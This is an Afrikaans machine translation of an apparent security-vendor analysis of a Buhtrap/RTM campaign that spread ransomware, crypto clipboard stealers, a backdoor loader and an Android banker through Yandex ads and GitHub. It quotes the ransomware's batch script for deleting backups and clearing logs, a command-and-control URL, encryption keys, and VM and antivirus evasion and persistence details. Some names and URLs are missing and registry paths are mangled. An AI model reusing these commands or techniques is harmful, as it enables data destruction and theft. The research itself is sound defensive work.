Om rekenmeesters in 'n kuberaanval te teiken, kan jy werkdokumente gebruik waarna hulle aanlyn soek. Dit is ongeveer wat 'n kubergroep die afgelope paar maande gedoen het en bekende agterdeure versprei het. и , sowel as enkripteerders en sagteware om kripto-geldeenhede te steel. Die meeste teikens is in Rusland geleë. Die aanval is uitgevoer deur kwaadwillige advertensies op Yandex.Direct te plaas. Potensiële slagoffers is na 'n webwerf verwys waar hulle gevra is om 'n kwaadwillige lêer af te laai wat as 'n dokumentsjabloon vermom is. Yandex het die kwaadwillige advertensies verwyder na ons waarskuwing.
Buhtrap se bronkode is in die verlede aanlyn uitgelek sodat enigiemand dit kan gebruik. Ons het geen inligting oor RTM-kode beskikbaarheid nie.
In hierdie pos sal ons jou vertel hoe die aanvallers wanware versprei het met Yandex.Direct en dit op GitHub aangebied het. Die pos sal afgesluit word met 'n tegniese ontleding van die wanware.
Buhtrap en RTM is terug in besigheid
Meganisme van verspreiding en slagoffers
Die verskillende loonvragte wat aan slagoffers gelewer word, deel 'n gemeenskaplike voortplantingsmeganisme. Alle kwaadwillige lêers wat deur die aanvallers geskep is, is in twee verskillende GitHub-bewaarplekke geplaas.
Tipies het die bewaarplek een aflaaibare kwaadwillige lêer bevat, wat gereeld verander het. Aangesien GitHub jou toelaat om die geskiedenis van veranderinge aan 'n bewaarplek te sien, kan ons sien watter wanware gedurende 'n sekere tydperk versprei is. Om die slagoffer te oortuig om die kwaadwillige lêer af te laai, is die webwerf blanki-shabloni24[.]ru, wat in die figuur hierbo gewys word, gebruik.
Die ontwerp van die webwerf en al die name van die kwaadwillige lêers volg 'n enkele konsep - vorms, sjablone, kontrakte, monsters, ens. As in ag geneem word dat Buhtrap en RTM sagteware reeds in die verlede in aanvalle op rekenmeesters gebruik is, het ons aanvaar dat die strategie in die nuwe veldtog is dieselfde. Die enigste vraag is hoe die slagoffer by die aanvallers se terrein gekom het.
Infeksie
Ten minste verskeie potensiële slagoffers wat op hierdie webwerf beland het, is deur kwaadwillige advertensies gelok. Hieronder is 'n voorbeeld-URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Soos u op die skakel kan sien, is die banier op die wettige rekeningkundige forum bb.f2[.]kz geplaas. Dit is belangrik om daarop te let dat die baniere op verskillende werwe verskyn het, almal dieselfde veldtog-ID (blanki_rsya) gehad het en die meeste verband hou met rekeningkundige of regshulpdienste. Die URL wys dat die potensiële slagoffer die versoek "aflaai faktuurvorm" gebruik het, wat ons hipotese van geteikende aanvalle ondersteun. Hieronder is die webwerwe waar die baniere verskyn het en die ooreenstemmende soeknavrae.
- laai faktuurvorm af – bb.f2[.]kz
- voorbeeldkontrak - Ipopen[.]ru
- aansoek klagte monster - 77metrov[.]ru
- ooreenkomsvorm - blank-dogovor-kupli-prodazhi[.]ru
- voorbeeld hof petisie - zen.yandex[.]ru
- monster klagte - yurday[.]ru
- voorbeeld kontrakvorms – Regforum[.]ru
- kontrakvorm – assistentus[.]ru
- voorbeeld woonstel ooreenkoms – napravah[.]com
- monsters van wettige kontrakte - avito[.]ru
Die blanki-shabloni24[.]ru-werf is moontlik gekonfigureer om 'n eenvoudige visuele assessering te slaag. Tipies lyk 'n advertensie wat na 'n werf met 'n professionele voorkoms met 'n skakel na GitHub verwys nie na iets duidelik sleg nie. Daarbenewens het die aanvallers kwaadwillige lêers slegs vir 'n beperkte tydperk na die bewaarplek opgelaai, waarskynlik tydens die veldtog. Meeste van die tyd het die GitHub-bewaarplek 'n leë zip-argief of 'n leë EXE-lêer bevat. Aanvallers kon dus advertensies deur Yandex.Direct versprei op werwe wat heel waarskynlik deur rekenmeesters besoek is wat in reaksie op spesifieke soeknavrae gekom het.
Kom ons kyk vervolgens na die verskillende loonvragte wat op hierdie manier versprei word.
Loonvrag analise
Chronologie van verspreiding
Die kwaadwillige veldtog het aan die einde van Oktober 2018 begin en is aktief ten tyde van die skryf hiervan. Aangesien die hele bewaarplek publiek beskikbaar was op GitHub, het ons 'n akkurate tydlyn van die verspreiding van ses verskillende malware-families saamgestel (sien figuur hieronder). Ons het 'n reël bygevoeg wat wys wanneer die banierskakel ontdek is, soos gemeet deur ESET-telemetrie, vir vergelyking met git-geskiedenis. Soos u kan sien, korreleer dit goed met die beskikbaarheid van die loonvrag op GitHub. Die teenstrydigheid aan die einde van Februarie kan verklaar word deur die feit dat ons nie 'n deel van die veranderingsgeskiedenis gehad het nie omdat die bewaarplek van GitHub verwyder is voordat ons dit volledig kon kry.
Figuur 1. Kronologie van wanware verspreiding.
Kode Ondertekening sertifikate
Die veldtog het verskeie sertifikate gebruik. Sommige is deur meer as een malware-familie onderteken, wat verder aandui dat verskillende monsters aan dieselfde veldtog behoort het. Ten spyte van die beskikbaarheid van die private sleutel, het operateurs nie stelselmatig die binaries onderteken nie en nie die sleutel vir alle monsters gebruik nie. Aan die einde van Februarie 2019 het aanvallers begin om ongeldige handtekeninge te skep met 'n sertifikaat wat deur Google besit word waarvoor hulle nie die private sleutel gehad het nie.
Alle sertifikate wat by die veldtog betrokke is en die wanwarefamilies wat hulle onderteken, word in die tabel hieronder gelys.
Ons het ook hierdie kodeondertekeningsertifikate gebruik om skakels met ander wanwarefamilies te vestig. Vir die meeste sertifikate het ons nie monsters gevind wat nie deur 'n GitHub-bewaarplek versprei is nie. Die TOV “MARIYA”-sertifikaat is egter gebruik om wanware wat aan die botnet behoort, te teken , reklameware en mynwerkers. Dit is onwaarskynlik dat hierdie wanware verband hou met hierdie veldtog. Heel waarskynlik is die sertifikaat op die donkernet gekoop.
Win32/Filecoder.Buhtrap
Die eerste komponent wat ons aandag getrek het, was die nuut ontdekte Win32/Filecoder.Buhtrap. Dit is 'n Delphi-binêre lêer wat soms verpak word. Dit is hoofsaaklik in Februarie–Maart 2019 versprei. Dit tree op soos dit 'n losprysprogram betaam - dit deursoek plaaslike dryf en netwerkvouers en enkripteer die bespeurde lêers. Dit het nie 'n internetverbinding nodig om gekompromitteer te word nie, want dit kontak nie die bediener om enkripsiesleutels te stuur nie. In plaas daarvan voeg dit 'n "token" aan die einde van die losprysboodskap, en stel voor dat u e-pos of Bitmessage gebruik om operateurs te kontak.
Om soveel as moontlik sensitiewe hulpbronne te enkripteer, loop Filecoder.Buhtrap 'n draad wat ontwerp is om sleutelsagteware af te sluit wat moontlik oop lêerhanteerders bevat wat waardevolle inligting bevat wat met enkripsie kan inmeng. Die teikenprosesse is hoofsaaklik databasisbestuurstelsels (DBBS). Daarbenewens verwyder Filecoder.Buhtrap loglêers en rugsteun om dataherwinning moeilik te maak. Om dit te doen, voer die bondelskrip hieronder uit.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap gebruik 'n wettige aanlyn IP Logger diens wat ontwerp is om inligting oor webwerf besoekers in te samel. Dit is bedoel om slagoffers van die losprysware op te spoor, wat die verantwoordelikheid van die opdragreël is:
mshta.exe "javascript:document.write('');"
Lêers vir enkripsie word gekies as hulle nie ooreenstem met drie uitsluitingslyste nie. Eerstens word lêers met die volgende uitbreidings nie geïnkripteer nie: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys en .kolf. Tweedens, alle lêers waarvoor die volledige pad gidsstringe uit die lys hieronder bevat, word uitgesluit.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Derdens word sekere lêername ook van enkripsie uitgesluit, onder andere die lêernaam van die losprysboodskap. Die lys word hieronder aangebied. Dit is duidelik dat al hierdie uitsonderings bedoel is om die masjien aan die gang te hou, maar met minimale padwaardigheid.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Lêer enkripsie skema
Sodra dit uitgevoer is, genereer die wanware 'n 512-bis RSA sleutelpaar. Die private eksponent (d) en modulus (n) word dan geïnkripteer met 'n hardgekodeerde 2048-bis publieke sleutel (openbare eksponent en modulus), zlib-verpak en base64-geënkodeer. Die kode wat hiervoor verantwoordelik is, word in Figuur 2 getoon.
Figuur 2. Resultaat van Hex-Strale dekompilasie van die 512-bis RSA sleutelpaar generasie proses.
Hieronder is 'n voorbeeld van gewone teks met 'n gegenereerde private sleutel, wat 'n teken is wat aan die losprysboodskap geheg is.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Die aanvallers se publieke sleutel word hieronder gegee.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Die lêers word geïnkripteer met behulp van AES-128-CBC met 'n 256-bis sleutel. Vir elke geïnkripteer lêer word 'n nuwe sleutel en 'n nuwe inisialiseringsvektor gegenereer. Die sleutelinligting word aan die einde van die geënkripteerde lêer bygevoeg. Kom ons kyk na die formaat van die geïnkripteer lêer.
Geënkripteerde lêers het die volgende kopskrif:
Die bronlêerdata met die byvoeging van die VEGA-magiese waarde word geïnkripteer tot die eerste 0x5000 grepe. Alle dekripsie-inligting is aangeheg aan 'n lêer met die volgende struktuur:
- Die lêergroottemerker bevat 'n merk wat aandui of die lêer groter as 0x5000 grepe is
— AES sleutel blob = ZlibCompress (RSAencrypt (AES sleutel + IV, publieke sleutel van die gegenereerde RSA sleutel paar))
- RSA sleutel blob = ZlibCompress (RSAencrypt (gegenereerde RSA privaat sleutel, hardgekodeerde RSA publieke sleutel))
Win32/ClipBanker
Win32/ClipBanker is 'n komponent wat met tussenposes van einde Oktober tot vroeg Desember 2018 versprei is. Die rol daarvan is om die inhoud van die knipbord te monitor, dit soek adresse van cryptocurrency-beursies. Nadat die teikenbeursie-adres bepaal is, vervang ClipBanker dit met 'n adres wat vermoedelik aan die operateurs behoort. Die monsters wat ons ondersoek het, was nie verpak of verduister nie. Die enigste meganisme wat gebruik word om gedrag te masker, is string-enkripsie. Operateursbeursieadresse word geïnkripteer met RC4. Teiken kripto-geldeenhede is Bitcoin, Bitcoin kontant, Dogecoin, Ethereum en Ripple.
Gedurende die tydperk wat die wanware na die aanvallers se Bitcoin-beursies versprei het, is 'n klein bedrag na VTS gestuur, wat twyfel oor die sukses van die veldtog. Daarbenewens is daar geen bewyse wat daarop dui dat hierdie transaksies hoegenaamd met ClipBanker verband hou nie.
Win32/RTM
Die Win32/RTM-komponent is vroeg in Maart 2019 vir etlike dae versprei. RTM is 'n Trojaanse bankier geskryf in Delphi, gemik op afgeleë bankstelsels. In 2017 het ESET-navorsers gepubliseer van hierdie program is die beskrywing steeds relevant. In Januarie 2019 het Palo Alto Networks ook vrygestel .
Buhtrap-laaier
Vir 'n geruime tyd was 'n aflaaier beskikbaar op GitHub wat nie soortgelyk was aan vorige Buhtrap-nutsgoed nie. Hy draai na https://94.100.18[.]67/RSS.php?<some_id> om die volgende stadium te kry en laai dit direk in die geheue. Ons kan twee gedrag van die tweede stadium kode onderskei. In die eerste URL het RSS.php die Buhtrap-agterdeur direk geslaag - hierdie agterdeur is baie soortgelyk aan die een wat beskikbaar was nadat die bronkode uitgelek is.
Interessant genoeg sien ons verskeie veldtogte met die Buhtrap-agterdeur, en hulle word na bewering deur verskillende operateurs bestuur. In hierdie geval is die belangrikste verskil dat die agterdeur direk in die geheue gelaai word en nie die gewone skema gebruik met die DLL-ontplooiingsproses waaroor ons gepraat het nie . Daarbenewens het die operateurs die RC4-sleutel verander wat gebruik word om netwerkverkeer na die C&C-bediener te enkripteer. In die meeste van die veldtogte wat ons gesien het, het operateurs nie die moeite gedoen om hierdie sleutel te verander nie.
Die tweede, meer komplekse gedrag was dat die RSS.php URL na 'n ander laaier oorgedra is. Dit het 'n mate van verduistering geïmplementeer, soos die herbou van die dinamiese invoertabel. Die doel van die selflaaiprogram is om die C&C-bediener te kontak [.]com/api/F27F84EDA4D13B15/2, stuur die logs en wag vir 'n antwoord. Dit verwerk die reaksie as 'n blob, laai dit in die geheue en voer dit uit. Die loonvrag wat ons gesien het wat hierdie laaier uitgevoer het, was dieselfde Buhtrap-agterdeur, maar daar kan ander komponente wees.
Android/Spy.Bankier
Interessant genoeg is 'n komponent vir Android ook in die GitHub-bewaarplek gevind. Hy was net een dag in die hooftak – 1 November 2018. Behalwe dat dit op GitHub geplaas is, vind ESET-telemetrie geen bewyse dat hierdie wanware versprei word nie.
Die komponent is as 'n Android-toepassingspakket (APK) aangebied. Dit is swaar vertroebel. Die kwaadwillige gedrag is versteek in 'n geënkripteerde JAR wat in die APK geleë is. Dit is geïnkripteer met RC4 met behulp van hierdie sleutel:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Dieselfde sleutel en algoritme word gebruik om stringe te enkripteer. JAR is geleë in APK_ROOT + image/files. Die eerste 4 grepe van die lêer bevat die lengte van die geïnkripteer JAR, wat onmiddellik na die lengteveld begin.
Nadat ons die lêer gedekripteer het, het ons ontdek dat dit Anubis was - voorheen bankier vir Android. Die wanware het die volgende kenmerke:
- mikrofoon opname
- neem skermkiekies
- om GPS-koördinate te kry
- keylogger
- toesteldata-enkripsie en losprysvraag
- spam stuur
Interessant genoeg het die bankier Twitter as 'n rugsteunkommunikasiekanaal gebruik om nog 'n C&C-bediener te bekom. Die monster wat ons ontleed het, het die @JonesTrader-rekening gebruik, maar ten tyde van die ontleding was dit reeds geblokkeer.
Die bankier bevat 'n lys teikentoepassings op die Android-toestel. Dit is langer as die lys wat in die Sophos-studie verkry is. Die lys sluit baie banktoepassings, aanlyn inkopieprogramme soos Amazon en eBay, en cryptocurrency-dienste in.
MSIL/ClipBanker.IH
Die laaste komponent wat as deel van hierdie veldtog versprei is, was die .NET Windows-uitvoerbare, wat in Maart 2019 verskyn het. Die meeste van die weergawes wat bestudeer is, is verpak met ConfuserEx v1.0.0. Soos ClipBanker, gebruik hierdie komponent die knipbord. Sy doelwit is 'n wye reeks kripto-geldeenhede, sowel as aanbiedinge op Steam. Daarbenewens gebruik hy die IP Logger-diens om die Bitcoin private WIF-sleutel te steel.
Beskermingsmeganismes
Benewens die voordele wat ConfuserEx bied om ontfouting, storting en peuter te voorkom, bevat die komponent die vermoë om antivirusprodukte en virtuele masjiene op te spoor.
Om te verifieer dat dit in 'n virtuele masjien loop, gebruik die wanware die ingeboude Windows WMI-opdragreël (WMIC) om BIOS-inligting aan te vra, naamlik:
wmic bios
Dan ontleed die program die opdraguitvoer en soek sleutelwoorde: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Om antivirusprodukte op te spoor, stuur wanware 'n Windows Management Instrumentation (WMI) versoek na Windows Sekuriteitsentrum met behulp van ManagementObjectSearcher API soos hieronder getoon. Na dekodering vanaf base64 lyk die oproep soos volg:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figuur 3. Proses vir die identifisering van antivirusprodukte.
Daarbenewens kontroleer die malware of , 'n instrument om teen knipbordaanvalle te beskerm en, as dit loop, skort alle drade in daardie proses op, waardeur die beskerming gedeaktiveer word.
Volharding
Die weergawe van wanware wat ons bestudeer het, kopieer homself na %APPDATA%googleupdater.exe en stel die "verborge" kenmerk vir die Google-gids. Dan verander sy die waarde SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell in die Windows-register en voeg die pad by updater.exe. Op hierdie manier sal die wanware uitgevoer word elke keer as die gebruiker aanmeld.
Kwaadwillige gedrag
Soos ClipBanker, monitor die wanware die inhoud van die knipbord en soek vir cryptocurrency-beursie-adresse, en wanneer dit gevind word, vervang dit met een van die operateur se adresse. Hieronder is 'n lys teikenadresse gebaseer op wat in die kode gevind word.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Vir elke tipe adres is daar 'n ooreenstemmende gereelde uitdrukking. Die STEAM_URL-waarde word gebruik om die Steam-stelsel aan te val, soos gesien kan word uit die gereelde uitdrukking wat gebruik word om in die buffer te definieer:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Ekfiltrasie kanaal
Benewens die vervanging van adresse in die buffer, teiken die wanware die private WIF-sleutels van Bitcoin, Bitcoin Core en Electrum Bitcoin-beursies. Die program gebruik plogger.org as 'n eksfiltrasiekanaal om die WIF-privaatsleutel te verkry. Om dit te doen, voeg operateurs privaatsleuteldata by die User-Agent HTTP-kopskrif, soos hieronder getoon.
Figuur 4. IP Logger-konsole met uitsetdata.
Operateurs het nie iplogger.org gebruik om beursies te eksfiltreer nie. Hulle het waarskynlik 'n ander metode gebruik as gevolg van die beperking van 255 karakters in die veld User-Agentvertoon in die IP Logger-webkoppelvlak. In die monsters wat ons bestudeer het, is die ander uitvoerbediener in die omgewingsveranderlike gestoor DiscordWebHook. Verbasend genoeg word hierdie omgewingsveranderlike nêrens in die kode toegewys nie. Dit dui daarop dat die wanware nog onder ontwikkeling is en die veranderlike word aan die operateur se toetsmasjien toegewys.
Daar is nog 'n teken dat die program in ontwikkeling is. Die binêre lêer bevat twee iplogger.org URL's, en beide word navraag gedoen wanneer data geëksfiltreer word. In 'n versoek aan een van hierdie URL's word die waarde in die Verwyser-veld voorafgegaan deur "DEV /". Ons het ook 'n weergawe gevind wat nie met ConfuserEx verpak is nie, die ontvanger vir hierdie URL is genaamd DevFeedbackUrl. Gebaseer op die omgewingsveranderlikenaam, glo ons dat die operateurs van plan is om die wettige diens Discord en sy webonderskeppingstelsel te gebruik om kripto-geldeenheid-beursies te steel.
Gevolgtrekking
Hierdie veldtog is 'n voorbeeld van die gebruik van wettige advertensiedienste in kuberaanvalle. Die skema teiken Russiese organisasies, maar ons sal nie verbaas wees om so 'n aanval te sien wat nie-Russiese dienste gebruik nie. Om kompromie te vermy, moet gebruikers vertroue hê in die reputasie van die bron van die sagteware wat hulle aflaai.
'n Volledige lys van aanwysers van kompromie en MITER ATT&CK eienskappe is beskikbaar by .
Bron: will.com